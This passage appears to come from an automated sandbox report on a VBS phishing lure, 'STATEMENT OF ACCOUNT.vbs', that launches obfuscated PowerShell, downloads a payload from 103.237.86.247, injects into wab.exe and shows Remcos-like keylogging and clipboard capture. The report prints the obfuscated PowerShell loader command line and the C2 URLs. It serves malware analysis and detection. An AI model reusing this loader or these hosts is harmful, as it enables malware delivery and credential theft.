                Source: wab.exe, 0000000D.00000003.2370974438.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371322290.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2370073946.0000000004CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2_ equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000D.00000003.2370974438.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371322290.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2370073946.0000000004CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2_ equals www.yahoo.com (Yahoo)
                Source: wab.exe, 0000000A.00000003.2347870319.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347553603.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2348008932.0000000004EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login8l equals www.facebook.com (Facebook)
                Source: wab.exe, 0000000A.00000003.2347870319.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347553603.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2348008932.0000000004EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login8l equals www.yahoo.com (Yahoo)
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
                Source: wab.exe, 00000009.00000002.3005639925.0000000022660000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000009.00000002.3005639925.0000000022660000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.2, http://103.23, http://103.237, http://103.237., http://103.237.8, http://103.237.86, http://103.237.86., http://103.237.86.2, http://103.237.86.24 (incrementally longer prefixes of http://103.237.86.247, each reported as a separate string)
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD808F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD6A44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/
                Source: wab.exe, 00000009.00000002.2993796074.00000000065E8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3004785425.00000000217A0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/NtqoCaH77.bin
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/U, http://103.237.86.247/Ud, http://103.237.86.247/Udm, http://103.237.86.247/Udma, http://103.237.86.247/Udmag, http://103.237.86.247/Udmagr, http://103.237.86.247/Udmagre, http://103.237.86.247/Udmagret, http://103.237.86.247/Udmagret., http://103.237.86.247/Udmagret.h, http://103.237.86.247/Udmagret.hh (incrementally longer prefixes of http://103.237.86.247/Udmagret.hhk, each reported as a separate string)
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD67F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmagret.hhk
                Source: powershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmagret.hhkXR
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD808F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237H
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0041183A OpenClipboard,GetLastError,DeleteFileW,10_2_0041183A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_0040987A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_00406DFC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_00406E9F
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004068B5
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,12_2_004072B5

                E-Banking Fraud

                Source: Yara match | File source: 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2991104356.0000000002F0F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: wab.exe PID: 7772, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                Source: amsi32_7372.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 9233
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 9233
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt 
Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process Stats: CPU usage > 49%
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00401806 NtdllDefWindowProc_W
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004018C0 NtdllDefWindowProc_W
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004016FD NtdllDefWindowProc_A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004017B7 NtdllDefWindowProc_A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00402CAC NtdllDefWindowProc_A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00402D66 NtdllDefWindowProc_A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B88BEA2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B88B0F6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_02A5F1F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_02A5FAC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_02A5EEA8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_2279B5C1
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 9_2_227A7194
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0044B040
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0043610D
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00447310
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0044A490
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0040755A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0043C560
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0044B610
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0044D6C0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004476F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0044B870
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0044081D
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00414957
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004079EE
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00407AEB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0044AA80
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00412AA9
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00404B74
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00404B03
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0044BBD8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00404BE5
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00404C76
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00415CFE
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00416D72
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00446D30
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00446D8B
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00406E8F
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00405038
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0041208C
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004050A9
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0040511A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0043C13A
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004051AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00449300
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0040D322
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0044A4F0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0043A5AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00413631
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00446690
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0044A730
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004398D8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004498E0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0044A886
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0043DA09
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00438D5E
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00449ED0
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0041FE83
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00430F54
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004050C2
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004014AB
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00405133
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004051A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00401246
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_0040CA46
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00405235
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_004032C8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00401689
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00402F60
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004169A7 appears 87 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 0044DB70 appears 41 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 004165FF appears 35 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00422297 appears 42 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00444B5A appears 37 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00413025 appears 79 times
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: String function: 00416760 appears 69 times
                Source: STATEMENT OF ACCOUNT.vbs | Initial sample: Strings found which are bigger than 50
                Source: amsi32_7372.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@26/15@1/3
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Fejdede.ell
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-LO8JHK
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asrbhln5.pt5.ps1
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | System information queried: HandleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5352
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7372
                Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: wab.exe, wab.exe, 0000000B.00000002.2347401354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.2367050724.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: wab.exe, 00000009.00000002.3005639925.0000000022660000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
